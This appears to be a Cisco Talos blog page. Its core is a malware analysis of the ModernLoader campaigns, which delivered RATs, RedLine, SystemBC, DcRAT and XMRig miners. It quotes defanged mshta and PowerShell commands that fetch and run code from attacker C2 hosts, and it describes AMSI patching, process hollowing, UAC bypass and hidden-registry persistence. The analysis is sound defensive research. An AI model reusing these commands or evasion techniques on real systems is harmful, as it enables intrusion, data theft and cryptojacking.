A widespread cyber attack is affecting government services in Montenegro, including water supply systems, transportation services and online government services. Montenegrin officials were quick to blame Russian state-sponsored actors for the attack earlier this week, saying it was the largest attack of this type the country’s ever faced. The FBI sent in a dedicated cybersecurity team to the country to help them recover services as fast as possible. The Cuba ransomware group took credit for the attack, saying it had stolen financial documents and more. Cuba made $43.9 million last year in ransom payments, according to the FBI. (CBS News, Recorded Future

A new warning from the FBI highlighted several recent attacks against decentralized finance (DeFi) platforms that have led to the loss of millions of dollars’ worth of cryptocurrency. The advisory says that attackers are exploiting individual vulnerabilities in popular DeFi platforms’ smart contracts and signature verification systems to break into users’ wallets or chaining together several flaws to manipulate digital currency pricing. Though the FBI told these platforms to analyze and patch their code, users should ensure they investigate potential platforms appropriately before choosing to store or invest their cryptocurrency somewhere. (ZDNet, Gizmodo

The U.S. Federal Trade Commission is suing a massive data broker for selling the location data of millions of mobile device users that could be directly tracked on an individual basis. The suit alleges the company did not anonymize the exact location data it was collecting from cell phones before selling it to other third-party outlets. The data could then be used to track a person’s exact activities. This could potentially allow anyone with the data to learn things about a user such as whether they are homeless, if they recently went to an abortion clinic or what their place of worship is, all of which are specifically highlighted in the suit. (Ars Technica, Reuters


Can’t get enough Talos? 


Upcoming events where you can find Talos 


Virtual 

Most prevalent malware files from Talos telemetry over the past week  


MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02 

MD5: 9066dff68c1d66a6d5f9f2904359876c 
Typical Filename: dota-15_id3622928ids1s.exe 
Claimed Product: N/A 
Detection Name: W32.F21B040F7C.in12.Talos 

MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

ModernLoader delivers multiple stealers, cryptominers and RATs

30 August 2022 at 12:00

By Vanja Svajcer

  • Cisco Talos recently observed three separate, but related, campaigns between March and June 2022 delivering a variety of threats, including the ModernLoader bot, RedLine information-stealer and cryptocurrency-mining malware to victims.
  • The actors use PowerShell, .NET assemblies, and HTA and VBS files to spread across a targeted network, eventually dropping other pieces of malware, such as the SystemBC trojan and DCRAT, to enable various stages of their operations. The attackers' use of a variety of off-the-shelf tools makes it difficult to attribute this activity to a specific adversary.
  • The final payload appears to be ModernLoader, which acts as a remote access trojan (RAT) by collecting system information and deploying various modules. In the earlier campaigns from March, we also observed the attackers delivering the cryptocurrency mining malware XMRig. The March campaigns appeared to be targeting Eastern European users, as the constructor utility we analyzed had predefined script templates written in Bulgarian, Polish, Hungarian and Russian.
  • The actors are attempting to compromise vulnerable web applications to serve malware and deliver threats via files masquerading as fake Amazon gift cards.

Technical details

Initial findings

In June 2022, Cisco Talos identified an unusual command line execution in our telemetry. The decoded base64 command is below:
Initial finding: A command executed on the system.

The 31.41.244[.]231 IP is a Russian IP and hosts several other URLs with similar naming conventions.

Autostart command

Following the discovery of the initial command, we identified two other command lines. They are a result of an autorun registered executable and the execution of a scheduled task.

The autorun executable and scheduled task command lines.

The first command connects to the download server and downloads an HTA application whose script is obfuscated with HTML Guardian, an application that encrypts HTML code.
The content displayed when the HTA file is opened in a browser.

When deobfuscated, the HTA file executes the VB script code to download and run PowerShell code from hxxp[:]//31[.]41[.]244[.]231/0x?0=Loader, which launches the next stage of the loading process.

Deobfuscated HTA code.

The autorunnn.exe module (d9c8e82c42e489ac7a484cb98fed40980d63952be9a88ff9538fc23f7d4eb27f) is a modified variant of the SharpHide open-source utility, which attempts to create a hidden registry entry. It uses NtSetValueKey native API to create a hidden (null-terminated) registry key by adding a null byte in front of the UNICODE_STRING key valuename. In our case, SharpHide is modified to create the following entry:

\HKLM|HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shell set to run the command: "explorer.exe, cmd /c mshta hxxp://go[.]clss[.]cl/0k#=GoogleWindowsAnalyticsConfiguration". The program also attempts to create a scheduled task which runs when the user logs onto the system. The task name is "OneDrive Standalone Update Task" and it will attempt to execute the sams command to download and run the PowerShell loader: "mshta hxxp[:]//go[.]clss[.]cl/0k#=GoogleWindowsAnalyticsConfiguration".
Modified SharpHide code is used to hide registry startup entry.

The URL serves PowerShell code which will be executed on the system.

As part of the logon sequence, the system executes a file, which ensures that the registry entry and the scheduled task set to download the next stage are set.

PowerShell loader

The next stage is the PowerShell loader. The loader contains embedded code of three modules, which are loaded using reflection as additional .NET assemblies into the PowerShell process space. The downloaded PowerShell code also downloads and runs auxiliary modules and payloads.

There are usually three modules in this loader format. The first disables AMSI scanning functionality, the second is the final payload, and the last injects the payload into the process space of a newly created process, usually RegSvcs.exe.

KillAMSI
Killamsi.dll is stored as a base64-encoded string split between the first two encoded characters and the rest of the encoded assembly DLL. The DLL contains obfuscated code, which attempts to patch Microsoft's AMSI interface (amsi.dll) AmsiScanBuffer function with the code to return an error value. This may prevent antimalware engines to scan executed PowerShell code and allow the attacker to bypass the detection of the next stages of the loader execution.
Amsi.dll is decoded, loaded and its Main function called.

Process injector
The last module in the loader file is "friday.dll." It is obfuscated with multiple layers of obfuscation, such as ConfuserEx and Dotnet reactor. It creates a new process and places the next injector stage into the newly created RegSvcs.exe process.
Friday.dll module is used to inject the next injection stage into RegSvcs.exe process.

The second-stage injector is an assembly: Managament.inf. It creates an instance of svchost.exe process and injects code using process-hollowing to load the final payload stored in the initial PowerShell loader script.

The injector creates a svchost.exe process in suspended mode and then allocates virtual memory for the injection of the payload module. The original svchost module is unmapped by calling the ZwUnmapViewOfSection.

This is followed by the fairly common injection sequence of API calls to get thread context, copy the data from the payload to the allocated virtual memory, set the thread context to point to the payload entry point and, finally, to resume the suspended thread.

Depending on the bitness of the operating system, the appropriate functions are used for getting and setting the thread contexts of the 32 bit process from the 64 bit operating system. The injected payload is Client.exe (3f5856a9ec23f6daf20fe9e42e56da1b8dcb0de66b6628a92b554d6e17c02fc3), a ModernLoader instance.

ModernLoader bot (aka Avatar bot)

The payload for the initial loader URL is a simple .NET remote access trojan, ModernLoader. ModernLoader has been in use since at least 2019, and some researchers are referring to it as "Avatar bot," although it has nothing in common with the rootkit documented in 2013 using the same name.
ModernLoader's constructor initializes the bot with a hardcoded C2 URL.

Once the bot is initialized, it collects the following information about the system and send the information to the C2 server using the HTTP Post request to hxxp[:]//31[.]41[.]244[.]231/AVAVA/gate[.]php:

  • Win32_ComputerSystemProduct UUID (using WMI to query the configuration data).
  • GPU details from Win32_DisplayConfiguration.
  • The AD or the workgroup name.
  • The external IP address by reading the response from http://ipinfo.io/ip.
  • The IP address country by reading the response from http://ipinfo.io/country.
  • The Windows operating system version information.
  • The amount of RAM.
  • The processor architecture and type.
  • The user privileges (admin or user).
  • Anti malware products installed on the affected system.
  • The amount of space left.
  • The bot version.
  • The name of the computers on the network (through querying local ActiveDirectory data).
  • The presence of an RDP module on the disk (used as auxiliary payload for the bot).


Once the initial data is sent, ModerLoader reads the response to find tasks returned from the servers using the JSON format. ModernLoader executes tasks using the function DoTask. DoTask accepts very few commands and can either execute a command line or download and execute a file. This limited functionality might have prompted the author to call this bot a loader, but for all intents and purposes, it is just a simple remote access trojan (RAT).

The advantage of using a loader such as ModernLoader is that the actor can change the campaigns and deploy different modules in real time. The way the modules are deployed, the payloads often exist only in RAM and not on the hard drive as files. Of course, this approach has a major weakness because it relies on a single IP address, which means the campaign is terminated as soon as the C2 server is offline. ModernLoader runs in an endless loop periodically contacting the C2 server for new tasks until the process is terminated.

ModernLoader is a staple of the campaigns we analyzed. Its main purpose is to download and execute additional payloads and modules, as instructed by the C2 server. Based on our telemetry data and the open-source intelligence, there are more than 10 additional modules hosted on the C2, but not all of them were available for download at the time of writing this post.

Earlier campaigns

During the investigation, we discovered two earlier campaigns from March 2022 that are closely related to the campaign using 31[.]41[.]244[.]231 as the C2 server. Both campaigns use similar TTPs, with ModerLoader as the main bot that communicates with the C2 server and additional modules served by C2 servers with IP addresses:
  • 62[.]204[.]41[.]192 and
  • 62[.]204[.]41[.]71
There are a few clues that confirm the relationship between these campaigns. The first is the task given to one of the infected systems using 62[.]204[.]41[.]71 as the C2 server. We first see the connection of the infected system to the C2 server and then the task to execute a PowerShell command to download and execute a module from 62[.]204[.]41[.]192, the C2 server used in another campaign.
Connecting two C2 servers in a C2 task assigned to the ModernLoader.

The link between 31[.]41[.]244[.]231 and 62[.]204[.]41[.]71 is found in a downloader, which is a part of the set of standalone downloaders linked with these campaigns. They usually have the name offer.exe and are written in Visual Basic 6. These downloaders provide the second infection vector.

The downloader that proves the second link is 27bb9ee41bc7745854e3f3687955f1a6df3bbd74a7d1050a68fe0d0e6087b4b3, which purports to be an update for the Brave web browser. The sample contains the code to launch PowerShell commands to download and run the code from:

  • hxxp[://]31[.]41[.]244[.]2311/AVAVA/WAW/Documents/go[.]oo
  • hxxp[://]31[.]41[.]244[.]2311/AVAVA/WAW/APPDATA/go[.]oo
  • hxxp[://]62[.]204[.]41[.]71/Offer/Offer[.]oo

Although the original IP address here is mistyped, the similarity to the newest C2 IP address is strong enough to link these campaigns.

Droppers (vs_community.exe theme)

The internal name of many droppers is vs_community.exe that is likely done to convince users that the files are part of the Visual Studio community edition. Most of the droppers are created with the 7-Zip SFX Constructor tool and the version information strings are likely kept the same for all of the dropper files created in the campaign.

Payload modules received from the C2 server

No.go
hxxp:[//]31[.]41[.]244[.]231/0xNANA/no[.]go is the first URL we discovered when investigating anomalous daily PowerShell invocations. Like the Loader module, it consists of the amsi.dll module with the ability to disable the AMSI interface, the payload to be loaded into RegSvcs.exe and the payload injector module friday.dll.

Since we already know how the process injection is implemented, we can focus on the payload. The payload is auto.exe, 142c333bef9eab4ce9d324e177572423c845ee399c01b4b78cfff730b4cb79b4 and another downloading stage. The stage creates a randomly named VB script and a randomly named installation information .inf file, which is opened using cmstp.exe (Connection Manager Profile Installer). The .inf file instructs the system to launch the VB script.

This somewhat convoluted execution of VB script is a likely attempt to circumvent the Windows User Account Control (UAC). The VB script is very similar to other VB scripts in the campaign and it simply attempts to download and execute PowerShell code from two URLs hosted on the C2 server.
A randomly named VBS file is stored in the resource section of the auto.exe module.

Unfortunately, at the time of the analysis, but it also seems during the observed attack, the two modules DEKL.go and ya.go were not accessible. Nevertheless, the observed attack chain continues with the request to download and execute the next module, which is Nana.go, from hxxp[://]31[.]41[.]244[.]231/0xNANA/file/NANA[.]go.

VB scripts employed in these campaigns contain the text that also exists in Emotet macro downloaders. It is not clear if they are an artifact of a code generator or they are taken from another source to make the detection of the script more difficult by randomizing some of the content. Although the comments contain grammatically correct sentences, they have very little meaning and may have been generated by something akin to the Markov Chain sentence generator.
Nana.go
During the observed attack, the Nana.go module is downloaded and executed with the filename 0xNax.exe. The module checksum is 4621924ff1b05ad7c15bc4b5dad68f7c8c3eceaf7824444b149264eff79d4b9a and is packed with UPX. The internal file version string name for this file indicates that it may be a Microsoft Visual Studio community installer. The vs_community.exe theme appears in the multiple files of the campaign. The name indicates that it may be spread on file sharing websites and P2P networks. The dropped file names in the campaign seem to be chosen to appear as legitimate Windows utilities.

Once unpacked, the module is a self-extracting 7-Zip file created with the 7-Zip SFX Constructor utility. The utility allows the user to add multiple files from a single folder to the 7-Zip archive with a stub that interprets a configuration data stored encrypted within the self-extracting file. The configuration data contains various instructions to the extractor stub, similar to a scripting engine. The scripting engine allows the user to specify where the file will be extracted and which commands should be run during the extraction process.

The Constructor utility seems to be targeted to Eastern European users with predefined script templates in Bulgarian, Polish, Hungarian and Russian.
 

7-Zip SFX Constructor script editor.

The 7-Zip SFX files are used throughout the campaign and nana.go is just one of them. When executed, it will drop and launch two additional modules - C:\Users\<Username>\AppData\Roaming\Log\AppData.exe, 7e73bc53cd4e540e1d492e6fd8ff630354cd8a78134e99bc0b252eccb559c97a and C:\Users\<Username>\AppData\Roaming\Log\OneDrive.exe, eb37c756c60a75068bfe88addd24e209080fe5383d25c919ea40fe78fff98612.

AppData.exe is another self-extracting 7-Zip file with the internal filename vs_community.exe. When executed, it drops and runs the following files:
  • C:\Users\<Username>\AppData\Roaming\WinServer\Log.exe (3f2f84147c55e5fc42261ace15ad55239d0bcba31a9acd20b99c999efbb9d392)
  • C:\Users\<Username>\AppData\Roaming\WinServer\AppData.exe ( d9c8e82c42e489ac7a484cb98fed40980d63952be9a88ff9538fc23f7d4eb27f)
The appdata.exe in the WinServer folder is identical to the already mentioned AUTORUNNN.exe, which sets the registry key to launch the infection process when the user logs into the system.

The module Log.exe drops and runs additional files:
  • C:\Users\<Username>\AppData\Roaming\UpdatersHelper\UpdatersHelper.exe (852857c66ee72f264c26d69c1f4092e99c2ed1fdcfef875f982fb75ed620ccc0). Internally the module name is BypassDefender. This seems to be a variant of the BypassDefender project whose source code is available on GitHub and the purpose is to disable Windows defender by stopping its service and the associated processes.
  • C:\Users\<Username>\AppData\Roaming\UpdatersHelper\UpdatersHelper.bat (435aa8b19125d795ada322aa8e30f3dd9afa03a4ac1350177c920426d1b17a47). This is a batch file that sets a scheduled job to run the UpdatersHelper.exe executable module and sets its attributes to the system and hidden so that it is not displayed in the default Windows Explorer view
OneDrive module is an injector that injects a .NET loader into the process space of conhost.exe. The injected shellcode sets up the process for the next injection stage, which is a .NET assembly that drops and loads additional modules and starts a copy of XMRig to mine Monero using a pool on pool.hashvault.pro using the pool address 44Ds8fbC3HWQCcwQotgrNDUWnmDixpQPG7YLh5h2rzSMQrxCRXeSjQvH8LRPNGSyqvXcKeEk3umZ7T2wzFAgovF15UckBxg.
Xmrig's connection to a cryptomining pool.

Based on the observed traffic in the Hashvault dashboard, it seems that the number of infected systems using this particular pool is in the low hundreds, with relatively low mining yield. Looking at the geography, most of the connections are coming from Indonesia and other Asian countries, along with Eastern Europe.
OneDrive.exe miner pool hash rate in second half of June.

Before executing the miner, the loader will attempt to load a watchdog process as well as the kernel driver that allows the writing of memory in kernel mode. The watchdog process, sihost64.exe, ensures that the miner is restored if the miner file is deleted and its process is restarted if terminated.

Several other commands exist that could disable Windows and Windows Defender.
Miner loader attempts to disable Windows update.

A scheduled task GoogleUpdateTaskMachineQC runs every time the user logs onto the system and launches the OneDrive.exe miner from C:\Users\<Users>\AppData\Roaming\OneDrive\OneDrive.exe.

The initial stub and the shellcode of the file is very similar to miners generated with a version of Silent Crypto Miner generator and the structure of the miner loader is also consistent with the loaders generated by the Silent Crypto Miner and SilentXMR projects.
Decompiled miner loader code.

Silent Crypto Miner loader source code.

Silent Crypto Miner is a generator that allows users with little knowledge of programming to create effective and resilient miner loaders.
Silent cryptocurrency miner builder form.
Meta, ww.cc and RegAsm.go
The PowerShell meta module is a loader that uses the similar three-assembly scheme to inject the payload beachy.exe into the process space of a newly created RegSvcs.exe process. Beachy.exe (b71c43bf7af23ed6a12bdb7ce96a4755b8a7f285b8aa802484e8b2dfa191f14e) is an obfuscated instance of the RedLine stealer using encrypted strings and legitimate class and function names to connect to the IP address 31[.]41[.]244[.]235:45692 as the C2 server.
Standard RedLine stealer authorization disguised as legitimate software.
RedLine URL module
Contrary to the URL name that serves this module, hxxp[://]31[.]41[.]244[.]231/0x/?0=RedLine, this module does not inject a variant of the RedLine stealer, but a variant of the ModernLoader bot (53b09a7c8bf41ed9015b8e3a98fb8b8581e82d17c1ead0bd0293f2e3e9996519).

As is the case with the original Loader module, the RedLine PowerShell script creates a new RegSvcs.exe hollowed process that launches the next stage of the injector that eventually moves the ModernLoader assembly client.exe into a newly created and hollowed svchost.exe process. This connects to the latest ModernLoader C2 script at hxxp[://]31[.]41[.]244[.]231/AVAVA/gate[.]php.

The RedLine module is usually downloaded by any of the standalone offer.exe executables (dc5255a5bcc89266ea0c7ca79f7a52ab281cbb6cc1980ee5b3a818114c01b93c), which also eventually downloads other modules to be executed:
  • hxxp[://]31[.]41[.]244[.]231/0xMine/RegAsm[.]go
  • hxxp[://]31[.]41[.]244[.]231/0xSocks/go[.]go - a simple script to download and launch socks.go module
  • hxxp[://]31[.]41[.]244[.]231/0xMine/go[.]go - a simple script to download and launch mine.go module
Mine.go
As opposed to the original and the RedLine loaders the Mine.go and Socks.go modules are not PowerShell scripts but Windows PE executables that are downloaded and launched by the previous commands downloaded from hxxp[://]31[.]41[.]244[.]231/0xMine/go[.]go and hxxp[://]31[.]41[.]244[.]231/0xSocks/go[.]go respectively.

The embedded modules in resources (encrypted) are:

  • Sihost64 (watchdog): Ensures the miner is running, injected by runpe module loaded into conhost.exe.
  • Injector (RunPE.Run): Injects PE files in a process name specified as an argument to the function.
  • WR64.sys: Driver that may allow writing to kernel mode memory.
  • mr: XMRig executable for Monero mining.
  • th: ethminer.

Decompiled miner code.

The .NET miner loader is very similar to the code generated by the Silent cryptocurrency miner, as seen in the Nana.go OneDrive.exe miner.

The major difference between the two is in the folders used to drop additional components and the mining pool site used for mining. Mine.go is using pool.supportxmr.com on TCP port 3333 for mining and the address is the same: 44Ds8fbC3HWQCcwQotgrNDUWnmDixpQPG7YLh5h2rzSMQrxCRXeSjQvH8LRPNGSyqvXcKeEk3umZ7T2wzFAgovF15UckBxg.
Mines.go
The Mines.go module (21e72be7f818e2afd4d53ee8f16c7e4a4718a95dd75b90d83fa26181e426f578) is another miner, but this time, the actors chose to use the so-called "Sapphire Multi-Coin" miner that's advertised on various forums for sale since at least February 2022. The module is observed to be downloaded by a small gos.go script, which is download by one of the standalone downloaders (1c58274fbbeaf7178a478aea5e27b52d5ead7c66e24371a4089568fa6908818c).

The miner module copies itself into %LOCALAPPDATA%\OneDrive\OneDrive.exe and creates a scheduled task to run the OneDrive.exe every minute. The miner creates the mutex 39cb3ed9d64849789471d05f94b7b62a that checks if the module is already running in memory.
Sapphire miner advertisment.

The miner is written in Golang and it is a wrapper around the XMRig miner. Based on the configuration, which can be downloaded from a remote server, the golang portion of the miner loads the XMRig miner, sets the registry key to ensure the miner is loaded and prepares the required parameters to choose which crypto currency will be mined based on the amount of RAM on the infected system.

The miner loader will attempt to read the encrypted zip miner archive from the registry entry HKCU>\SOFTWARE\Wow64\<SHA256_encrypted> (96cd98d42b896f6c92fd97b435d727497102ca91ce6e95252251a28e0c3fb9f8) if it exists. If it does not, the Sapphire loader will attempt to download it from the URL predefined in its configuration.

Based on the GPU type and the amount of RAM of the infected host, the Sapphire miner injected XMR using process-hollowing into the process space of a newly created svchost.exe process or a smartscreen.exe process.
The miner executable is downloaded and decrypted before being injected into a process.

The actual XMRig miner can be stored on the remote server, and in the case of the Mines.go module, the miner is downloaded from hxxp[://]31[.]41[.]244[.]231/0xMine/Temp[.]exe. The downloaded file is an AES-encrypted ZIP file that contains the XMRig miner and the WinRing0x64.sys helper driver. As above the XMRig is configured to use pool.supportxmr.com on TCP port 3333 with the same mining pool address.
Socks.go
The Socks.go module is an executable protected with Themida protector. The module contains a variant of the SystemBC back connect remote access Trojan with proxy functionality. The SystemBC connects to the same C2 IP address as the RedLine stealer module — 31[.]41[.]244[.]235 — but it uses TCP port 4440. SystemBC may allow the attacker to use the infected system as a proxy for their activities.
Autorun
The command to download and run the Autorun module by the ModernLoader bot is often observed together with the Meta module. The autorun downloads and runs the module autorunnn.exe, which sets a scheduled task to download and run the initial infection HTA application file hosted on the C2 server hxxp[://]31[.]41[.]244[.]231/0x?0=WindowsAnalyticsConfiguration. It also modifies a value in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run so that the same mshta command is run when a user logs onto the system.
Hello.go
Hello.go module (3232126860f3729dda59f9db6476773997b4bcfb08e2e4b32b5214c30507d775), downloaded by at least one of the standalone downloaders (1c58274fbbeaf7178a478aea5e27b52d5ead7c66e24371a4089568fa6908818c), is a vs_community.exe UPX packed self-extracting 7-Zip dropper which drops and runs a number of other modules, most of them are focused on mining, and some on bypassing Windows defender. The module is similar to the nana.go payload, but contains more components. When the module is run, it drops the following files:

  • %APPDATA%\nexts\killduplicate.cmd
  • %APPDATA%\nexts\mine.exe - Silent Crypt miner
  • %APPDATA%\nexts\output.exe
  • %LOCALAPPDATA%\appdata.exe
  • %APPDATA%\winserv\killduplicate.cmd
  • %APPDATA%\winserv\appdata.exe
  • %APPDATA%\winserv\updatershelper.exe
  • %APPDATA%\install+\appdata.bat
  • %APPDATA%\install+\killduplicate.cmd
  • %APPDATA%\links\killduplicate.cmd
  • %APPDATA%\links\mine.exe
  • %APPDATA%\link\killduplicate.cmd
  • %APPDATA%\link\mine.exe
  • %APPDATA%\link\mines.exe
  • %APPDATA%\onedrive\onedrive.exe
  • %LOCALAPPDATA%\onedrive\onedrive.exe
  • %APPDATA%\drives\off.bat
  • %APPDATA%\drives\updatershelper.exe
  • %APPDATA%\google\libs\wr64.sys
The modules are focused on establishing an environment to mine crypto currency, with miners and auxiliary modules tasked with disabling Windows updates and Windows Defender.
Ws.go
Ws.go module (dd24e5596c318b30c05cffc7467f5649564ab93874c9201bf758a1a2ce05228c) is observed as downloaded and executed by one of the tasks launched by the C2 server to the ModernLoader.

Ws.go contains the already described PowerShell three assembly module loader scheme which attempts to inject the module XBinder-Output.exe (40d68523748f6eaf765970a40458faccbe84ef5dff7acbdaf29ac5a69d7cae6f). XBinder-Output exe contains a VB script WindowsConfiguration.vbs (c103c7686739669f3cfc123de34bdadb803c4ec8727cf12cd7cdc56be4bf60e1) in its resource section. The resource is encrypted and when decrypted is saved on the disk as %LOCALAPPDATA%\OneDrive\WindowsConfiguration.vbs and started.

The VB script is a wrapper for PowerShell code which attempts to download and run the initial ModernLoader loader module from hxxp[://]31[.]41[.]244[.]231/0x/Loader[.]go.
Ws.go drops and runs code to execute the initial ModernLoader loader.

XBinder-Output sets the registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsConfiguration to point to the dropped WindowsConfiguration VB script so it is run every time the user logs onto the system.
SmartScreen.ps
Downloaded by 1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5 which first loads a small script from hxxp[://]31[.]41[.]244[.]231/AVAVA/WAW/APPDATA/go.oo eventually loads an instance of ModernLoader connecting to the same C2 IP URL hxxp[://]31[.]41[.]244[.]231/AVAVA/gate[.]php.
Auto.oo
Auto.oo is an auxiliary module also downloaded by 1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5, and it launches an instance of SharpHide (881235fca4aeeb88950b952c0d9ce1a7d9a4eb838ce7d79447a26d2f45b1eaa5) which creates a hidden registry entry to start a copy of the SmartScreen Module every time the user logs onto the system.
XboxLive.ps
Downloaded by 1ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5, which first downloads and runs a small script from hxxp[://]31[.]41[.]244[.]231/AVAVA/WAW/Documents/go.oo and eventually loads an instance of the ModernLoader (09db213df3dbd950a8bc75246be72f5b572b00dbd3a5bba45c7074443d0928a7) into the process space of svchost.exe configured to connect to the same C2 URL hxxp[://]31[.]41[.]244[.]231/AVAVA/gate[.]php.

Each campaign has its own unique version name although the functionality of the loader is the same. The first loader version is "Live" while SmartScreen.ps and XBoxLive.ps each have their own version name which can presumably be tracked in the C2 server panel by the operator.
R0.go
This module has been spotted in the dynamic analysis of the 7-Zip self-extracting dropper 4a6ef2379195140aa31d339329ca06bd28589fa13fd88cfcf9d76cb2d4ab99c1. The module is a three assembly PowerShell which loads an obfuscated injector for a variant of the DcRAT (2c631588c491aa32c20f6a99201ba82982a31b1c763054562d59cd1a5a1ea14b).

The loader is first injected into the process space of RegSvcs.exe and then into the process space of a newly created svchost.exe process.

The DcRAT client is configured to connect to the IP address 31.41.244.235, just as the other RATs in this campaign. The TCP port to use is 8848. At the time of analysis, the host was not accessible.
Decrypted DcRAT configuration data.

Additional payloads

Discord Spreader
While searching for other modules communicating with C2 servers we spotted a file 838170edffbca1cadef3b7039330376c1aad914883103834c25e9bb92d9bfad1, purporting to be a copy of the µTorrent Web BitTorrent client. Once executed the file drops another randomly named file, which is a downloader written in Visual Basic with the code similar to other Offer.exe downloaders. The downloader, 9b347b48026f205733abbc24c502dfff5428341e10c6944687cdbfe70770f5f3, executes the following PowerShell command to download and run code from 62[.]204[.]41[.]71.
Discord Spreader module download.

The interesting thing about the dropper is that it is based on the Project Discord Spreader, an open-source module available on GitHub. The utility is a Discord token stealer which may be used to spread the original file on Discord by sending messages to channels where the user of the stolen Discord tokens is active. The spreader can also include a user-mode rootkit r77 or additional payloads in the assembly ManifestResource stream. A builder is available to create new instances of the spreader and the sample used in this campaign was obfuscated with .NET obfuscators.
The Discord Spreader builder.

The author also left a message in the code to "help" anti-malware researchers when analyzing the sample.
The message to analysts.
Amazon offer added to archives
This technique was observed on one of the infected systems in our telemetry. We observed the addition of a fake Amazon voucher named Amazon.com Gift Card 500 USD.gift.hta to archive files, such as RAR, 7-Zip and ZIP already present on the infected system. Each file's checksum is different, which indicates use of mild obfuscation to evade detection.

We were unable to retrieve those HTA files from the infected systems but found a related file on VirusTotal, (5750d8d557fdcb6afb2d8cb52993fb07ac84a63aab0afc44efe30ffe08d48c2f), which contains code to communicate with 62[.]204[.]41[.]71 and whose filename is "Amazon Gift Card 500 USD.gift.vbs." The script first attempts to call PowerShell to download and run code from the URL hxxp://62[.]204[.]41[.]71/SPM/Spam.o' and then opens the browser to a link created by the URL shortening service hxxps://goo[.]su/DaqHw open a page that offers the user an alleged free Amazon gift card worth $500 USD.
PHP scripts
The actor seems to be interested in compromising vulnerable web applications and changing their configuration so that malicious PHP scripts serve malicious content to the users of the compromised application.

One particular file, artadd.php (9704fa1a8242643f66572e7ee68e4e7d7bec9e7054319b8551fed4b3b0ccdd45) has been found in a few instances of compromised WordPress and CPanel applications. The file is obfuscated with a very simple obfuscation scheme and it eventually executes the code to download additional components futer.php (a249c275b0ad384ae1906d2ec169f77abce9d712ab8470eb5fe7040a71948026) and .htaccess (f013d15d2203ec6a90be789d4b58c99ca7e42d9beedb9c4c0b05f599e2eb0ea0) from 62[.]204[.]41[.]192.
PHP script on compromised apps downloads additional components.

The function of the .htaccess file is in this case to configure redirects to the futer.php if the browser accesses any files on the site with the extensions .zip, .exe or .rar. If the extension in the request matches the above, futer.php will execute code that retrieves a file from the actor's command and control (C2) server and serve that instead of the requested executable.
PHP file attempts to replace a requested file with a malicious file from the C2 server.

Summary

This post represents the most notable portions of three campaigns we discovered in June. These campaigns portray an actor experimenting with different technology. The usage of ready-made tools shows that the actor understands the TTPs required for a successful malware campaign but their technical skills are not developed enough to fully develop their own tools. As a consequence of using off-the-shelf tools, the group improves its operational security and there are no obvious signs of who the actor behind the attacks is, except that they likely speak Russian.
The most recent ModernLoader campaign modules.

The actor is frequently using open-source components and code generators to achieve its goals. A number of remote access tools, stealers and cryptominers are used in the campaigns to eventually reap financial benefits for the actor. The actor has an interest in alternative distribution channels such as compromised web applications, archive infections and spreading by using Discord webhooks. Despite all the techniques and tactics used we estimate that the success of these campaigns is limited. Cisco Talos continues to monitor all available sources for signs of similar campaigns.

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 60437-60440

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

Indicators of Compromise

Indicators of Compromise associated with this threat can be found here.

Threat Roundup for August 19 to August 26

26 August 2022 at 19:37

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 19 and Aug. 26. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

